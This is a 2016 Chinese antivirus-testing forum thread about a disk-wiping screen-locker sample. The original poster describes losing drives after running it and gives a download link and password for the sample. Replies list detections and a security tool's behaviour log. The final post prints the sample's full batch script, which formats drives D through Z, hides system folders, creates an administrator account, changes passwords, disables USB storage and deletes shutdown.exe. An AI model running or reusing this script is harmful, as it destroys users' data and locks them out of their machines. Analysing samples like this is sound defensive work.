锁机加格盘病毒样本

ARISTZL

手贱实机运行了，系统装有火绒+卡巴。运行后修改系统账户密码、创建系统账户均被火绒拦截，定时关机指令手动命令行取消掉。出去吃个饭回来一看才发现被格盘了。装有微软跟苹果双系统。苹果系统彻底消失了。。天呐 ,,,,求助，还有我是默认显示隐藏文件夹的，但我的C盘根目录好多文件夹不见了。还有如何恢复苹果系统
链接: http://pan.baidu.com/s/1gfDEuFx 密码: thmx

dongwenqi

to卡巴

心痛的伤不起

avg kill

cfhdrty

ess好像是报壳
Win32/Packed.VMProtect.ABO 特洛伊木马 的变种 - 通过删除清除

数字miss

windows7爱好者

cfhdrty 发表于 2016-4-30 19:38
ess好像是报壳
Win32/Packed.VMProtect.ABO 特洛伊木马 的变种 - 通过删除清除

hmap实机双击未触发防御点
还好是影子

z2009

解压，bg秒

感染的对象： ￧ﾔﾵ￨ﾄﾑ￩ﾔﾁ￦ﾜﾺ￦ﾖﾇ￤ﾻﾶ￥ﾈﾆ￦ﾞﾐ￥ﾙﾨ.EXE

恶意软件：  Gen:Trojan.Heur.GM.0400460880
路径： C:\USERS\JUHON\DESKTOP\￧ﾗﾅ￦ﾯﾒ￦ﾷ￦ﾜﾬ-￨ﾧﾣ￥ﾎﾋ￥ﾯﾆ￧ﾁ123\￧ﾔﾵ￨ﾄﾑ￩ﾔﾁ￦ﾜﾺ￦ﾖﾇ￤ﾻﾶ￥ﾈﾆ￦ﾞﾐ￥ﾙﾨ.EXE
感染的进程： [7748] D:\tools\WinRAR\WinRAR.exe

学雷锋做人

Comodo拿下一血

诸葛亮

红伞

275751198

360 QVM

电脑发烧友

【2】2016-04-30 20:54:22,系统防护,自定义防护,bt2626.bat触犯自定义文件防护规则, 已忽略

操作进程：C:\Users\wuliao\AppData\Local\Temp\bt2626.bat
触犯规则：文件组 ➢驱动文件
操作类型：创建
操作文件：C:\c：\usbstor.sys
用户操作：已忽略

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

【3】2016-04-30 20:54:22,系统防护,自定义防护,bt2626.bat触犯自定义文件防护规则, 已阻止

操作进程：C:\Users\wuliao\AppData\Local\Temp\bt2626.bat
触犯规则：行为防御➢风险程序禁运
操作类型：读取
操作文件：C:\Windows\System32\replace.exe
用户操作：已阻止

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

【4】2016-04-30 20:54:22,系统防护,自定义防护,bt2626.bat触犯自定义文件防护规则, 已阻止

操作进程：C:\Users\wuliao\AppData\Local\Temp\bt2626.bat
触犯规则：行为防御➢风险程序禁运
操作类型：读取
操作文件：C:\Windows\System32\shutdown.exe
用户操作：已阻止

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

【5】2016-04-30 20:54:21,系统防护,自定义防护,bt2626.bat触犯自定义文件防护规则, 已忽略

操作进程：C:\Users\wuliao\AppData\Local\Temp\bt2626.bat
触犯规则：文件组 ➢驱动文件
操作类型：创建
操作文件：C:\c：\usbstor.sys
用户操作：已忽略

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

【6】2016-04-30 20:54:19,系统防护,自定义防护,bt2626.bat触犯自定义文件防护规则, 已忽略

操作进程：C:\Users\wuliao\AppData\Local\Temp\bt2626.bat
触犯规则：文件组 ➢驱动文件
操作类型：创建
操作文件：C:\Windows\usbstor.sys
用户操作：已忽略

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

【7】2016-04-30 20:54:17,系统防护,文件保护,bt2626.bat触犯文件防护规则, 已忽略

操作进程：C:\Users\wuliao\AppData\Local\Temp\bt2626.bat
风险动作：修改系统目录
目标文件：C:\Windows\usbstor.sys
用户操作：已忽略

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

【8】2016-04-30 20:54:13,系统防护,自定义防护,电脑锁机文件分析器.EXE触犯 , 已忽略

操作进程：C:\Users\wuliao\Desktop\电脑锁机文件分析器.EXE
触犯规则：文件组➢脚本批处理即将被执行\调用命令行
操作类型：执行
C:\Windows\System32\cmd.exe
用户操作：已忽略

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

【9】2016-04-30 20:54:13,系统防护,自定义防护,bt2626.bat触犯自定义文件防护规则, 已阻止

操作进程：C:\Users\wuliao\AppData\Local\Temp\bt2626.bat
触犯规则：行为防御➢风险程序禁运
操作类型：读取
操作文件：C:\Windows\System32\format.com
用户操作：已阻止

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

【10】2016-04-30 20:54:13,系统防护,自定义防护,bt2626.bat触犯自定义文件防护规则, 已阻止

操作进程：C:\Users\wuliao\AppData\Local\Temp\bt2626.bat
触犯规则：行为防御➢风险程序禁运
操作类型：读取
操作文件：C:\Windows\System32\attrib.exe
用户操作：已阻止

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

【11】2016-04-30 20:54:13,系统防护,自定义防护,bt2626.bat触犯自定义文件防护规则, 已阻止

操作进程：C:\Users\wuliao\AppData\Local\Temp\bt2626.bat
触犯规则：行为防御➢风险程序禁运
操作类型：读取
操作文件：C:\Windows\System32\net.exe
用户操作：已阻止

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

【12】2016-04-30 20:54:13,系统防护,自定义防护,bt2626.bat触犯自定义文件防护规则, 已阻止

操作进程：C:\Users\wuliao\AppData\Local\Temp\bt2626.bat
触犯规则：行为防御➢风险程序禁运
操作类型：读取
操作文件：C:\Windows\System32\reg.exe
用户操作：已阻止

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

【13】2016-04-30 20:54:10,系统防护,自定义防护,电脑锁机文件分析器.EXE触犯 , 已忽略

操作进程：C:\Users\wuliao\Desktop\电脑锁机文件分析器.EXE
触犯规则：文件组➢脚本批处理即将被执行\调用命令行
操作类型：执行
C:\Windows\system32\cmd.exe
用户操作：已忽略

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

【14】2016-04-30 20:54:08,系统防护,自定义防护,电脑锁机文件分析器.EXE触犯自定义文件防护规则, 已忽略

操作进程：C:\Users\wuliao\Desktop\电脑锁机文件分析器.EXE
触犯规则：文件组 ➢可执行文件
操作类型：创建
操作文件：C:\Users\wuliao\AppData\Local\Temp\bt2626.bat
用户操作：已忽略

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

批处理内容
[mw_shl_code=css,true]@echo off echo y
for %%a in (d e f g h i j k l m n o p q r s t u v w x y z) do format %%a: /q /u /x /y
cd c:\
attrib +s +h "windows"
attrib +s +h "Program Files"
attrib +s +h "Documents and Settings"
net user QQ7967387 "Mamba.Ss. " /add
net localgroup administrators QQ7967387/add
net user administrator "Mamba.Ss.. "
net user admin Mamba.
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v AutoAdminLogon /d 1
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v DefaultUserName /d QQ7967387
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v DefaultPassword /d
net user administrator /active:no
COPY %systemroot%\system32\drivers\usbstor.sys %systemroot%\usbstor.sys
copy %systemroot%\hh.exe c：\usbstor.sys /y
replace c：\usbstor.sys %systemroot%\system32\drivers
attrib +s +h +r %systemroot%\system32\drivers\usbstor.sys
shutdown -s
cd C:\WINDOWS\system32
del shutdown.exe
[/mw_shl_code]